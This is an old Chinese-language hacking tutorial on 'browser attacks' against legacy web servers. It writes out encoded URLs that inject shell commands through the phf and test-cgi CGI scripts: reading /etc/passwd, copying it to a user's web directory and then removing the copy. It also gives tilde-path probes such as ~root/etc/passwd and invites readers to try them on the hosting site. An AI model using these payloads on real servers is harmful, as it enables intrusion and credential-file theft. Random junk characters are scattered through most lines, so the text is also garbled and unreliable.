瀏覽器攻擊

在本章我將講述一些利用瀏覽器來進行攻擊的方法
1。大家都知道了phf攻擊了，phf是cgi script,很多站點都有這個大漏洞啦，使用
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那個站點的passwd.但還有些更好的執(zhí)行方法呦如：
4 B  {4 t+ m* c% R/ \, C& w. u! Hhttp://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna
$ u( U$ A# Q% C3 I# i
me=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
haqr&Qemail=&Qnickname=&Qoffice_phone=
" g! ?( d  n5 z% k- K6 _http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
4 u3 Y* c# k0 Y4 b%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
9 m0 }9 ^9 E. L: ^" }% Xhttp://thegnome.com/~someuser/passwd
4 l' J# G% c; H8 }http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
3 `! k& {$ B8 e% l. e+ H4 l
3 {/ Z  V+ p2 F/ ?( u/ B=haqr&Qemail=&Qnickname=&Qoffice_phone=
; v. y9 i7 q3 X  D1 f; ]# i上面執(zhí)行的命令是
( z3 n5 Y" V6 a# ~# Eid
- C$ R8 S. s: o; {# {8 ]0 r. _+ J# els -la ~someuser
4 ^8 M' `4 ~% n# b- c7 f, Q% x; x- c7 kcp /etc/passwd ~someuser/passwd
rm ~someuser/passwd

2。有關test攻擊
; ]" R2 ~* f: A3 \7 khttp://thegnome.com/cgi-bin/test-cgi?\whatever
* V) |1 Z. J! _0 V+ k% U* j2 N服務器會應答，本服務器的一些情況如：
; B4 j# F' x% A# ]* |% a: z# N1 r: qCGI/1.0 test script report:

argc is 0. argv is .
0 v' q  s1 I( Z& C7 }
& T3 q! [8 C+ _7 p% S# ^/ XSERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
' w9 X! Q$ ]: Q1 u* Z7 fSERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
( A$ K5 C7 _$ ^( b3 QREQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
" U, c6 f. m; J, ctext/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
8 z5 f, p  a, wQUERY_STRING = whatever
# h2 U7 R# o! p* K: |# V# {: RREMOTE_HOST = fifth.column.gov
9 w( x2 t1 f7 t* J4 ^REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
4 ?' a- ~2 [5 V! lAUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

好吧，讓我們來點趕興趣的
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
& S& I# Z& `' P* X( j
5 Q) A1 V1 |: Q2 U& o- U3。~的應用
+ r2 I( M# s& T* U& a~主要是用在很多的個人主頁上的快捷目錄的方法，如果我們使用這樣的~
http://thegnome.com/~root
http://thegnome.com/~root/etc/passwd
, I% r8 u1 U$ ]不是在任何平臺上都通過呦，在BSD Apache上曾經成功過,當然還可以試試~bin ,~etc,~uucp.....
. n3 @( ?) y. o" U- C' c看到這個站點了嗎，本站所在的這個站點就是用這種形式的，如果我們打入 本站所在的web地址/~bin
出現(xiàn)了什么，你看到了嗎？然后...............注意請不要破壞
' s% O, c6 s) N: T. P& ^' o6 O